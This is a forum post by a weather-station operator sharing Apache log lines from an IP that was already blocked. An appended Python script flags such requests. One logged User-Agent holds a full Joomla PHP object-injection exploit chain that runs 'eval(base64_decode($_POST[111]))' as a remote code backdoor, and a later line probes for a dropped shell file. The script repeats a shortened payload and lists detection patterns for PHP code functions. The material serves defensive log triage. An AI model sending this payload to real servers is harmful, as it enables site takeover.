Author Topic: Interesting server log this morning  (Read 375 times)


Offline sacreyweather

Interesting server log this morning
« on: January 30, 2019, 11:24:02 AM »
Came across these lines this morning while looking my logs over:

185.234.217.204 - - [30/Jan/2019:07:20:49 -0500] "GET / HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 163 87439 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:51 -0500] "GET / HTTP/1.1" 403 724 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86" 0 0 "off:-:-" 508 107208 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:54 -0500] "POST / HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 994 88448 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:54 -0500] "GET /libraries/sfn.php HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 180 100350 192.252.144.23 salineweather.com

IP is out of Ireland, and yes it has a 403 on it already because of some earlier activity from this IP, but I found it interesting as to what they were attempting to do, and thought I would share for others to see.


John
CWOP: D2073, GR2AE, GR3, Cumulus, PWSweather,  CoCoRaHS: AR-SL-23  

Saline Weather on Twitter
Blitzortung Station 1387
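
An added example, not part of the original post: a small Python triage pass that flags access-log lines whose User-Agent or Referer carries a PHP serialized object or PHP code, as the second log line above does, and then lists every other request from the same address. It assumes the log layout and `\"` escaping shown in the post; the sample lines are constructed (documentation-range IPs, shortened payload), and `triage`, `unescape` and `INDICATORS` are hypothetical names.

```python
import re

# One quoted log field; the log writer stores embedded quotes as \" so allow escapes.
FIELD = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + FIELD + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>' + FIELD + r')" "(?P<ua>' + FIELD + r')"'
)

# Patterns that have no business appearing in a User-Agent or Referer header.
INDICATORS = {
    "php_serialized_object": re.compile(r'O:\d+:"[\w\\]+":\d+:\{'),
    "session_key_delimiter": re.compile(r'\}__\w+\|'),
    "php_code_in_header": re.compile(r'\b(?:eval|assert|base64_decode|system)\s*\(', re.I),
}

# Constructed sample modelled on the lines in the post (not real traffic).
SAMPLE_LOG = r'''
203.0.113.7 - - [30/Jan/2019:07:20:49 -0500] "GET / HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
203.0.113.7 - - [30/Jan/2019:07:20:51 -0500] "GET / HTTP/1.1" 403 724 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));\";}"
203.0.113.7 - - [30/Jan/2019:07:20:54 -0500] "GET /libraries/sfn.php HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
198.51.100.9 - - [30/Jan/2019:07:21:02 -0500] "GET /wxstatus.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip().splitlines()

def unescape(field):
    # Undo the log writer's backslash escaping of quotes and backslashes.
    return re.sub(r'\\(["\\])', r'\1', field)

def triage(lines):
    # Returns (flagged, related): lines with a suspicious header, and every
    # request made by an address that sent at least one such line.
    entries = [m.groupdict() for m in map(LINE_RE.match, lines) if m]
    flagged = []
    for e in entries:
        headers = unescape(e["ua"]) + "\n" + unescape(e["ref"])
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(headers))
        if hits:
            flagged.append({"ip": e["ip"], "ts": e["ts"], "hits": hits})
    bad_ips = {f["ip"] for f in flagged}
    related = [(e["ip"], e["req"], e["status"]) for e in entries if e["ip"] in bad_ips]
    return flagged, related

if __name__ == "__main__":
    flagged, related = triage(SAMPLE_LOG)
    for f in flagged:
        print("FLAGGED", f["ip"], f["ts"], ", ".join(f["hits"]))
    for ip, req, status in related:
        print("RELATED", ip, status, req)
```

Any flagged address whose related requests include a non-403 status is the case worth a closer look.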